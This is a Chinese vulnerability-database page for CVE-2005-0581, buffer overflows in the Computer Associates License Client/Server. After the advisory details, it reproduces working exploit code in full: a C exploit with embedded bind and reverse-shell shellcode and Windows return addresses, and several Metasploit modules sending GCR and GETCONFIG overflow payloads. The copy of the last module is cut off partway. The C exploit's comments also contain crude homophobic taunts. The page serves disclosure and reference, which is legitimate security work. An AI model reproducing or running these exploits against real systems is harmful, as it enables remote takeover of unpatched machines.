CVE-2005-0581
CVSS4.6
发布时间 :2005-05-02 00:00:00
修订时间 :2016-10-17 23:12:53
NMCOEPS    

[原文]Multiple buffer overflows in Computer Associates (CA) License Client and Server 0.1.0.15 allow remote attackers to execute arbitrary code via (1) certain long fields in the Checksum item in a GCR request, (2) a long IP address, hostname, or netmask values in a GCR request, (3) a long last parameter in a GETCONFIG packet, or (4) long values in a request with an invalid format.


[CNNVD]CA License Client/Server GETCONFIG缓冲区溢出漏洞(CNNVD-200505-112)

        CA License Client/Server对GETCONFIG请求参数的处理上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器或客户端上执行任意指令。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0581
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0581
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-112
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=110979326828704&w=2
(UNKNOWN)  BUGTRAQ  20050302 License Patches Are Now Available To Address Buffer Overflows
http://supportconnectw.ca.com/public/ca_common_docs/security_notice.asp
(VENDOR_ADVISORY)  CONFIRM  http://supportconnectw.ca.com/public/ca_common_docs/security_notice.asp
http://www.idefense.com/application/poi/display?id=210&type=vulnerabilities
(VENDOR_ADVISORY)  IDEFENSE  20050302 Computer Associates License Client and Server Invalid Command Buffer Overflow
http://www.idefense.com/application/poi/display?id=213&type=vulnerabilities
(VENDOR_ADVISORY)  IDEFENSE  20050302 Computer Associates License Client/Server GETCONFIG Buffer Overflow
http://www.idefense.com/application/poi/display?id=214&type=vulnerabilities
(VENDOR_ADVISORY)  IDEFENSE  20050302 Computer Associates License Client/Server GCR Network Buffer Overflow
http://www.idefense.com/application/poi/display?id=215&type=vulnerabilities
(VENDOR_ADVISORY)  IDEFENSE  20050302 Computer Associates License Client/Server GCR Checksum Buffer Overflow

- 漏洞信息

CA License Client/Server GETCONFIG缓冲区溢出漏洞
中危 缓冲区溢出
2005-05-02 00:00:00 2005-10-20 00:00:00
远程  
        CA License Client/Server对GETCONFIG请求参数的处理上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器或客户端上执行任意指令。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://supportconnectw.ca.com/public/reglic/downloads/licensepatch.asp#alp" target="_blank

- 漏洞信息 (859)

CA License Server (GETCONFIG) Remote Buffer Overflow Exploit (c) (EDBID:859)
windows remote
2005-03-06 Verified
10203 class101
N/A [点击下载]
/*
Computer-Associates, License Service Stack Overflow

Homepage:         ca.com
Affected version: v1.61 and below (in eTrust, Unicenter, BrightStor, etc..)
Patched  version: hotfix
Link:             ca.com
Date:             04 March 2005

Application Risk: Tsunami
Internet Risk:    High

Dicovery Credits: Barnaby Jack (eeye.com)
Exploit Credits : class101

Hole History:

		02-3-2005: BOF flaws published by Barnaby Jack of eeye.com
		04-3-2005: metasploit module released
		06-2-2005: hat-squad exploit released using again another way than msf,
		           a nasty way auto-bypassing XP/2003 stack's protections :)

Notes:

		-2 bad chars, 0x00, 0x20
		-This is possible to trigger at least several big flaws per affected commands,
			case1: you own eip, ebx 4 bytes up to it is usable
			case2: you own eip, esp pointing right after is usable
			case3: you own eip, esi pointing into the buffer
			In this exploit, I have choosed case2, allowing us to overwrite eip with a
			jmp/call esp, a push esp, retn or why not something useful in a ca's dll, w00t :P, can be a good challenge to search on this, look around 
			0x10010000.licscvr.dll 			
		-tiny upgrade of the awesome vlad902's shellcode to remove that f'king 0x20 into the decoded reverse shellcode v1.31
		    by the way, sending up this bad char to the bottom of what you know of some amazing wannabel33t deface kiddies crawling my website,
		    talking in sh0utb0x, sucking my c0x, answer in a code, he! :-) (IHS , iranian homosec deface team to not name them :>)
		-beware that the ca license service autoban and this is possible to know the OS with
		    A0 GETCONFIG SELF A <EOM>

Greet:

		NIMA MAJIDI
		BEHRANG FOULADI
		PEJMAN
		HAMID! :)
		HAT-SQUAD.COM
		metasploit.com
		A^C^E of addict3d.org
		str0ke of milw0rm.com
		and my homy CLASS101.ORG :>
*/

#include <stdio.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif

char scode[]=
"\x33\xC9\x83\xE9\xAF\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xBB"
"\x1E\xD3\x6A\x83\xEB\xFC\xE2\xF4\x47\x74\x38\x25\x53\xE7\x2C\x95"
"\x44\x7E\x58\x06\x9F\x3A\x58\x2F\x87\x95\xAF\x6F\xC3\x1F\x3C\xE1"
"\xF4\x06\x58\x35\x9B\x1F\x38\x89\x8B\x57\x58\x5E\x30\x1F\x3D\x5B"
"\x7B\x87\x7F\xEE\x7B\x6A\xD4\xAB\x71\x13\xD2\xA8\x50\xEA\xE8\x3E"
"\x9F\x36\xA6\x89\x30\x41\xF7\x6B\x50\x78\x58\x66\xF0\x95\x8C\x76"
"\xBA\xF5\xD0\x46\x30\x97\xBF\x4E\xA7\x7F\x10\x5B\x7B\x7A\x58\x2A"
"\x8B\x95\x93\x66\x30\x6E\xCF\xC7\x30\x5E\xDB\x34\xD3\x90\x9D\x64"
"\x57\x4E\x2C\xBC\x8A\xC5\xB5\x39\xDD\x76\xE0\x58\xD3\x69\xA0\x58"
"\xE4\x4A\x2C\xBA\xD3\xD5\x3E\x96\x80\x4E\x2C\xBC\xE4\x97\x36\x0C"
"\x3A\xF3\xDB\x68\xEE\x74\xD1\x95\x6B\x76\x0A\x63\x4E\xB3\x84\x95"
"\x6D\x4D\x80\x39\xE8\x4D\x90\x39\xF8\x4D\x2C\xBA\xDD\x76\xD3\x0F"
"\xDD\x4D\x5A\x8B\x2E\x76\x77\x70\xCB\xD9\x84\x95\x6D\x74\xC3\x3B"
"\xEE\xE1\x03\x02\x1F\xB3\xFD\x83\xEC\xE1\x05\x39\xEE\xE1\x03\x02"
"\x5E\x57\x55\x23\xEC\xE1\x05\x3A\xEF\x4A\x86\x95\x6B\x8D\xBB\x8D"
"\xC2\xD8\xAA\x3D\x44\xC8\x86\x95\x6B\x78\xB9\x0E\xDD\x76\xB0\x07"
"\x32\xFB\xB9\x3A\xE2\x37\x1F\xE3\x5C\x74\x97\xE3\x59\x2F\x13\x99"
"\x11\xE0\x91\x47\x45\x5C\xFF\xF9\x36\x64\xEB\xC1\x10\xB5\xBB\x18"
"\x45\xAD\xC5\x95\xCE\x5A\x2C\xBC\xE0\x49\x81\x3B\xEA\x4F\xB9\x6B"
"\xEA\x4F\x86\x3B\x44\xCE\xBB\xC7\x62\x1B\x1D\x39\x44\xC8\xB9\x95"
"\x44\x29\x2C\xBA\x30\x49\x2F\xE9\x7F\x7A\x2C\xBC\xE9\xE1\x03\x02"
"\x54\xD0\x33\x0A\xE8\xE1\x05\x95\x6B\x1E\xD3\x6A";

char scode2[]=
/*original vlad902's reverse shellcode from metasploit.com
  NOT xored, modded by class101 to remove the common badchar "\x20"
  original bytes + modded = 291 + 3 = 294 bytes reverse shellcode v1.31*/
"\xFC\x6A"
"\xEB\x52" /*modded adjusting jump*/
"\xE8\xF9\xFF\xFF\xFF\x60\x8B\x6C\x24\x24\x8B\x45\x3C\x8B\x7C\x05"
"\x78\x01\xEF"
"\x83\xC7\x01" /*modded, adding 1 to edi*/
"\x8B\x4F\x17" /*modded, adjusting ecx*/
"\x8B\x5F\x1F" /*modded, adjusting ebx, "\x20" out, yeahouu ;>*/
"\x01\xEB\xE3\x30\x49\x8B\x34\x8B\x01\xEE\x31\xC0\x99\xAC\x84\xC0"
"\x74\x07\xC1\xCA\x0D\x01\xC2\xEB\xF4\x3B\x54\x24\x28\x75\xE3"
"\x8B\x5F\x23" /*modded, adjusting ebx*/
"\x01\xEB\x66\x8B\x0C\x4B"
"\x8B\x5F\x1B" /*modded, adjusting ebx*/
"\x01\xEB\x03\x2C\x8B\x89\x6C\x24\x1C\x61\xC3\x31\xC0\x64\x8B\x40"
"\x30\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\x5E\x68\x8E\x4E\x0E"
"\xEC\x50\xFF\xD6\x31\xDB\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32"
"\x5F\x54\xFF\xD0\x68\xCB\xED\xFC\x3B\x50\xFF\xD6\x5F\x89\xE5\x66"
"\x81\xED\x08\x02\x55\x6A\x02\xFF\xD0\x68\xD9\x09\xF5\xAD\x57\xFF"
"\xD6\x53\x53\x53\x53\x43\x53\x43\x53\xFF\xD0\x68\x00\x00\x00\x00"
"\x66\x68\x00\x00\x66\x53\x89\xE1\x95\x68\xEC\xF9\xAA\x60\x57\xFF"
"\xD6\x6A\x10\x51\x55\xFF\xD0\x66\x6A\x64\x66\x68\x63\x6D\x6A\x50"
"\x59\x29\xCC\x89\xE7\x6A\x44\x89\xE2\x31\xC0\xF3\xAA\x95\x89\xFD"
"\xFE\x42\x2D\xFE\x42\x2C\x8D\x7A\x38\xAB\xAB\xAB\x68\x72\xFE\xB3"
"\x16\xFF\x75\x28\xFF\xD6\x5B\x57\x52\x51\x51\x51\x6A\x01\x51\x51"
"\x55\x51\xFF\xD0\x68\xAD\xD9\x05\xCE\x53\xFF\xD6\x6A\xFF\xFF\x37"
"\xFF\xD0\x68\xE7\x79\xC6\x79\xFF\x75\x04\xFF\xD6\xFF\x77\xFC\xFF"
"\xD0\x68\xEF\xCE\xE0\x60\x53\xFF\xD6\xFF\xD0";

char payload[8192];

char esp2k[]="\x9F\xF8\x1A\x01";  /*jmp.esp*/
char espNT[]="\xA8\x14\xF9\x77";  /*push.esp.return*/
char espXP1[]="\x5E\xF0\xF7\x77";  /*push.esp.return*/
char espXP2[]="\x5C\xC3\x92\x7C";  /*push.esp.return*/
char espk3[]="\xAB\x8B\xFB\x77";  /*jmp.esp*/
char EOL[]="\x0D\x0A";
char talk1[]=
"\x47\x42\x52\x20";
char talk2[]=
"\x20\x3C\x45\x4F\x4D\x3E";

#ifdef WIN32
	WSADATA wsadata;
#endif

void ver();
void usage(char* us);

int main(int argc,char *argv[])
{
	ver();
	unsigned long gip;
	unsigned short gport;
	char *target, *os;
	if (argc>6||argc<3||atoi(argv[1])>5||atoi(argv[1])<1){usage(argv[0]);return -1;}
	if (argc==5){usage(argv[0]);return -1;}
    if (strlen(argv[2])<7){usage(argv[0]);return -1;}
    if (argc==6)
	{
        if (strlen(argv[4])<7){usage(argv[0]);return -1;}
	}
#ifndef WIN32
	if (argc==6)
	{
 		gip=inet_addr(argv[4])^(long)0x00000000;
		gport=htons(atoi(argv[5]))^(short)0x0000;
	}
#define Sleep		sleep
#define SOCKET		int
#define closesocket(s) close(s)
#else
	if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;}
	if (argc==6)
	{
		gip=inet_addr(argv[4])^(ULONG)0x00000000;
		gport=htons(atoi(argv[5]))^(USHORT)0x0000;
	}
#endif
	int ip=htonl(inet_addr(argv[2])), port;
	if (argc==4||argc==6){port=atoi(argv[3]);} else port=10203;
	SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
	s=socket(AF_INET,SOCK_STREAM,0);
	if (s==-1){printf("[+] socket() error\n");return -1;}
	if (atoi(argv[1]) == 1){target=esp2k;os="Win2k SP4 Server English\n[+]            Win2k SP4 Pro    English\n[+]            Win2k SP? ?      ?";}
	if (atoi(argv[1]) == 2){target=espNT;os="WinNT SP6 Wkst. English";}
	if (atoi(argv[1]) == 3){target=espXP2;os="WinXP SP2 Pro. English";}
	if (atoi(argv[1]) == 4){target=espXP1;os="WinXP SP1a Pro. English";}
	if (atoi(argv[1]) == 5){target=espk3;os="Win2003 SP4 Server English";}
	printf("[+] target(s): %s\n",os);
	server.sin_family=AF_INET;
	server.sin_addr.s_addr=htonl(ip);
	server.sin_port=htons(port);
	connect(s,( struct sockaddr *)&server,sizeof(server));
	timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
	switch(select(s+1,NULL,&mask,NULL,&timeout))
	{
		case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
		case 0: {printf("[+] connect() error\n");closesocket(s);return -1;}
		default:
		if(FD_ISSET(s,&mask))
		{
			printf("[+] connected, constructing the payload...\n");
#ifdef WIN32
			Sleep(1000);
#else
			Sleep(1);
#endif
			strcpy(payload,talk1);
			memset(payload+4,0x90,3208);
			memcpy(payload+2024+4,target,4);
			strcat(payload,talk2);strcat(payload,EOL);
			if (argc==6)
			{
				memcpy(&scode2[167], &gip, 4);
				memcpy(&scode2[173], &gport, 2);
				memcpy(payload+2038,scode2,strlen(scode2));
			}
			else memcpy(payload+2038,scode,strlen(scode));
			if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 1, the server prolly rebooted.\n");return -1;}
#ifdef WIN32
			Sleep(2000);
#else
			Sleep(2);
#endif
			printf("[+] size of payload: %d\n",strlen(payload));
			printf("[+] payload sent.\n");
			return 0;
		}
	}
	closesocket(s);
#ifdef WIN32
	WSACleanup();
#endif
	return 0;
}


void usage(char* us)
{
	printf("USAGE:                                                                         \n");
	printf("      [+]  . 101_calic.exe Target VulnIP (bind mode)                           \n");
	printf("      [+]  . 101_calic.exe Target VulnIP VulnPORT (bind mode)                  \n");
	printf("      [+]  . 101_calic.exe Target VulnIP VulnPORT GayIP GayPORT (reverse mode) \n");
	printf("TARGET:                                                                        \n");
	printf("      [+] 1. Win2k  SP4  Server English (*)                                    \n");
	printf("      [+] 1. Win2k  SP4  Pro    English (*)                                    \n");
	printf("      [+] 1. Win2k  SP?  ?      ?                                              \n");
	printf("      [+] 2. WinNT  SP6  Wkst.  English (*)                                    \n");
	printf("      [+] 3. WinXP  SP2  Pro.   English                                        \n");
	printf("      [+] 4. WinXP  SP1a Pro.   English (*)                                    \n");
	printf("      [+] 5. Win2k3 SP0  Server English                                        \n");
	printf("NOTE:                                                                          \n");
	printf("      The exploit bind a cmdshell port 101 or                                  \n");
	printf("      reverse a cmdshell on your listener.                                     \n");
	printf("      A wildcard (*) mean tested working, else, supposed working.              \n");
	printf("      A symbol   (-) mean all.                                                 \n");
	printf("      Compilation msvc6, cygwin, Linux.                                        \n");
	return;
}
void ver()
{
	printf("                                                                     \n");
	printf("        ===================================================[0.1]=====\n");
	printf("        =======Computer Associates, License Client Service===========\n");
	printf("        ==============Remote Stack Overflow Exploit==================\n");
	printf("        ======coded by class101==================[Hat-Squad.com]=====\n");
	printf("        =====================================[class101.org 2005]=====\n");
	printf("                                                                     \n");
}

// milw0rm.com [2005-03-06]
		

- 漏洞信息 (16414)

CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow (EDBID:16414)
windows remote
2010-11-03 Verified
0 metasploit
N/A [点击下载]
##
# $Id: license_gcr.rb 10892 2010-11-03 22:09:44Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup 11.0.
				By sending a specially crafted request to the lic98rmtd.exe service, an attacker
				could overflow the buffer and execute arbitrary code.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10892 $',
			'References'     =>
				[
					[ 'CVE', '2005-0581' ],
					[ 'OSVDB', '14389' ],
					[ 'BID', '12705' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x09\x0a\x0d\x20\x0c\x25\x26\x27\x0b\x2b\x2f\x3a\x3c\x3e\x3f\x40",
					'StackAdjustment' => -3500,
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform' => 'win',
			'Targets'  =>
					[
						[ 'Windows 2003 SP0 English',     { 'Ret' => 0x71ae1f9b } ], # JMP ESP wshtcpip.dll
						[ 'Windows 2000 SP4 English',     { 'Ret' => 0x7c30d043 } ], # JMP ESP advapi32.dll
					],
			'DisclosureDate' => 'Mar 2 2005',
			'DefaultTarget' => 0))

		register_options([ Opt::RPORT(10202) ], self.class)
	end

	def exploit
		connect

		buff =  rand_text_alpha_upper(256) + [target.ret].pack('V')
		buff << make_nops(12) + payload.encoded

		# NETWORK<x.x.x.x buff x.x.x.x.x> ... worked for me.
		sploit  = "A0 GCR NETWORK<#{buff}>RMTV<1.00><EOM>"

		print_status("Trying target #{target.name}...")

		sock.put(sploit)

		handler
		disconnect
	end

end
		

- 漏洞信息 (16744)

Computer Associates License Client GETCONFIG Overflow (EDBID:16744)
windows remote
2010-09-20 Verified
10203 metasploit
N/A [点击下载]
##
# $Id: calicclnt_getconfig.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'Computer Associates License Client GETCONFIG Overflow',
			'Description'	=> %q{
					This module exploits an vulnerability in the CA License Client
				service. This exploit will only work if your IP address can be
				resolved from the target system point of view. This can be
				accomplished on a local network by running the 'nmbd' service
				that comes with Samba. If you are running this exploit from
				Windows and do not filter udp port 137, this should not be a
				problem (if the target is on the same network segment). Due to
				the bugginess of the software, you are only allowed one connection
				to the agent port before it starts ignoring you. If it wasn't for this
				issue, it would be possible to repeatedly exploit this bug.
			},
			'Author' =>
				[
					'Thor Doomen <syscall [at] hushmail.com>', # original msf v2 module
					'patrick', # msf v3 port :)
				],
			'License' => MSF_LICENSE,
			'Version' => '$Revision: 10394 $',
			'References'	=>
				[
					[ 'CVE', '2005-0581' ],
					[ 'OSVDB', '14389' ],
					[ 'BID', '12705' ],
					[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213' ],
				],
			'Privileged' => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload' =>
				{
					'Space'	=> 600,
					'BadChars' => "\x00\x20",
					'StackAdjustment' => -3500,

				},
			'Platform'	=> 'win',
			'Targets' =>
				[
					# As much as I would like to return back to the DLL or EXE,
					# all of those modules have a leading NULL in the
					# loaded @ address :(
					# name, jmp esi, writable, jmp edi
					#['Automatic', {} ],
					#
					# patrickw - tested OK Windows XP English SP0-1 only 20100214
					['Windows 2000 English',	{ 'Rets' => [ 0x750217ae, 0x7ffde0cc, 0x75021421 ] } ], # ws2help.dll esi + peb + edi
					['Windows XP English SP0-1',	{ 'Rets' => [ 0x71aa16e5, 0x7ffde0cc, 0x71aa19e8 ] } ], # ws2help.dll esi + peb + edi
					['Windows XP English SP2',	{ 'Rets' => [ 0x71aa1b22, 0x71aa5001, 0x71aa1e08 ] } ], # ws2help.dll esi + .data + edi
					['Windows 2003 English SP0',	{ 'Rets' => [ 0x71bf175f, 0x7ffde0cc, 0x71bf1a2c ] } ], # ws2help.dll esi + peb + edi
				],
			'DisclosureDate' => 'Mar 02 2005'))

		register_options(
			[
				Opt::RPORT(10203),
				OptPort.new('SRVPORT', [ true, "Fake CA License Server Port", 10202 ]),
			], self.class)
	end

	#def check
		# It is possible to check, but due to a software bug, checking prevents exploitation
	#end

	def exploit
		if (connect)
			sock.put("A0 GETSERVER<EOM>\n")
			print_status("Initial packet sent to remote agent...")
			disconnect

			fakecaservice = Rex::Socket::TcpServer.create(
				'LocalHost' => '0.0.0.0',
				'LocalPort' => datastore['SRVPORT'],
				'SSL'       => false,
				'Context'   =>
					{
						'Msf'        => framework,
						'MsfExploit' => self,
					})

			add_socket(fakecaservice)

			fakecaservice.start
			print_status("Waiting for the license agent to connect back...")
			begin
				Timeout.timeout(3) do
					done = false
					while (not done and session = fakecaservice.accept)
						print_status("Accepted connection from agent #{Rex::Socket.source_address(rhost)}..")
						session.put("A0 GETCONFIG SELF 0<EOM>")
						req = session.recvfrom(2000)[0]
						next if not req
						next if req.empty?

						if (req =~ /OS\<([^\>]+)/)
							print_status("Target reports OS: #{$1}")
						end

						# exploits two different versions at once >:-)
						# 144 -> return address of esi points to string middle
						# 196 -> return address of edi points to string beginning
						# 148 -> avoid exception by patching with writable address
						# 928 -> seh handler (not useful under XP SP2)
						buff = rand_text_alphanumeric(900)
						buff[142, 2] = Rex::Arch::X86.jmp_short(8) 		# jmp over addresses
						buff[144, 4] = [target['Rets'][0]].pack('V') 		# jmp esi
						buff[148, 4] = [target['Rets'][1]].pack('V')		# writable address
						buff[194, 2] = Rex::Arch::X86.jmp_short(4)		# jmp over address
						buff[196, 4] = [target['Rets'][2]].pack('V')		# jmp edi
						buff[272, payload.encoded.length] = payload.encoded

						sploit = "A0 GETCONFIG SELF #{buff}<EOM>"
						session.put(sploit)
						session.close
					end
				end
			ensure
				handler
				fakecaservice.close
				return
			end
		end
	end

end

=begin
eTrust: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.2>OLFFILE<0 0 0>SERVER<RMT>VERSION<0 1.61.0>NETWORK<192.168.3.22 unknown 255.255.255.0>MACHINE<PC_686_1_2084>CHECKSUMS<0 0 0 0 0 0 0 00 0 0 0>RMTV<1.3.1><EOM>
BrightStor: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
lic98rmt.exe v0.1.0.15: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.61.0>NETWORK<192.168.139.128 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
=end

		

- 漏洞信息 (16745)

Computer Associates License Server GETCONFIG Overflow (EDBID:16745)
windows remote
2010-09-20 Verified
10202 metasploit
N/A [点击下载]
##
# $Id: calicserv_getconfig.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name' => 'Computer Associates License Server GETCONFIG Overflow',
			'Description'	=> %q{
					This module exploits an vulnerability in the CA License Server
				network service. By sending an excessively long GETCONFIG
				packet the stack may be overwritten.
			},
			'Author' =>
				[
					'Thor Doomen <syscall [at] hushmail.com>', # original msf v2 module
					'patrick', # msf v3 port :)
				],
			'License' => MSF_LICENSE,
			'Version' => '$Revision: 10394 $',
			'References'	=>
				[
					[ 'CVE', '2005-0581' ],
					[ 'OSVDB', '14389' ],
					[ 'BID', '12705' ],
					[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213' ],
				],
			'Privileged' => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload' =>
				{
					'Space'	=> 600,
					'BadChars' => "\x00\x20",
					'StackAdjustment' => -3500,

				},
			'Platform'	=> 'win',
			'Targets' =>
				[
					# As much as I would like to return back to the DLL or EXE,
					# all of those modules have a leading NULL in the
					# loaded @ address :(
					# name, jmp esi, writable, jmp edi
					#['Automatic', {} ],
					#
					# patrickw - tested OK Windows XP English SP0-1 only 20100214
					['Windows 2000 English',	{ 'Rets' => [ 0x750217ae, 0x7ffde0cc, 0x75021421 ] } ], # ws2help.dll esi + peb + edi
					['Windows XP English SP0-1',	{ 'Rets' => [ 0x71aa16e5, 0x7ffde0cc, 0x71aa19e8 ] } ], # ws2help.dll esi + peb + edi
					['Windows XP English SP2',	{ 'Rets' => [ 0x71aa1b22, 0x71aa5001, 0x71aa1e08 ] } ], # ws2help.dll esi + .data + edi
					['Windows 2003 English SP0',	{ 'Rets' => [ 0x71bf175f, 0x7ffde0cc, 0x71bf1a2c ] } ], # ws2help.dll esi + peb + edi
				],
			'DisclosureDate' => 'Mar 02 2005'))

		register_options(
			[
				Opt::RPORT(10202),
			], self.class)
	end

	def check
		connect
		banner = sock.get_once
		sock.put("A0 GETCONFIG SELF 0<EOM>")
		res = sock.get_once
		disconnect
		if (res =~ /OS\<([^\>]+)/)
			print_status("CA License Server reports OS: #{$1}")
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect
		banner = sock.get_once
		if (banner !~ /GETCONFIG/)
			print_status("The server did not return the expected greeting!")
		end

		# exploits two different versions at once >:-)
		# 144 -> return address of esi points to string middle
		# 196 -> return address of edi points to string beginning
		# 148 -> avoid exception by patching with writable address
		# 928 -> seh handler (not useful under XP SP2)
		buff = rand_text_alphanumeric(900)
		buff[142, 2] = Rex::Arch::X86.jmp_short(8) 		# jmp over addresses
		buff[144, 4] = [target['Rets'][0]].pack('V') 		# jmp esi
		buff[148, 4] = [target['Rets'][1]].pack('V')		# writable address
		buff[194, 2] = Rex::Arch::X86.jmp_short(4)		# jmp over address
		buff[196, 4] = [target['Rets'][2]].pack('V')		# jmp edi
		buff[272, payload.encoded.length] = payload.encoded

		sploit = "A0 GETCONFIG SELF #{buff}<EOM>"
		sock.put(sploit)

		handler
		disconnect
	end

end

=begin
eTrust: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.2>OLFFILE<0 0 0>SERVER<RMT>VERSION<0 1.61.0>NETWORK<192.168.3.22 unknown 255.255.255.0>MACHINE<PC_686_1_2084>CHECKSUMS<0 0 0 0 0 0 0 00 0 0 0>RMTV<1.3.1><EOM>
BrightStor: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
lic98rmt.exe v0.1.0.15: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.61.0>NETWORK<192.168.139.128 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
=end

		

- 漏洞信息 (F86301)

Computer Associates License Client GETCONFIG Overflow (PacketStormID:F86301)
2010-02-15 00:00:00
patrick,Thor Doomen  metasploit.com
exploit,local,udp
windows
CVE-2005-0581
[点击下载]

This Metasploit module exploits an vulnerability in the CA License Client service. This exploit will only work if your IP address can be resolved from the target system point of view. This can be accomplished on a local network by running the 'nmbd' service that comes with Samba. If you are running this exploit from Windows and do not filter udp port 137, this should not be a problem (if the target is on the same network segment). Due to the bugginess of the software, you are only allowed one connection to the agent port before it starts ignoring you. If it wasn't for this issue, it would be possible to repeatedly exploit this bug.

##
# $Id: calicclnt_getconfig.rb 8478 2010-02-13 16:16:13Z patrickw $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'		=> 'Computer Associates License Client GETCONFIG Overflow',
			'Description'	=> %q{
				This module exploits an vulnerability in the CA License Client
				service. This exploit will only work if your IP address can be 
				resolved from the target system point of view. This can be
				accomplished on a local network by running the 'nmbd' service
				that comes with Samba. If you are running this exploit from
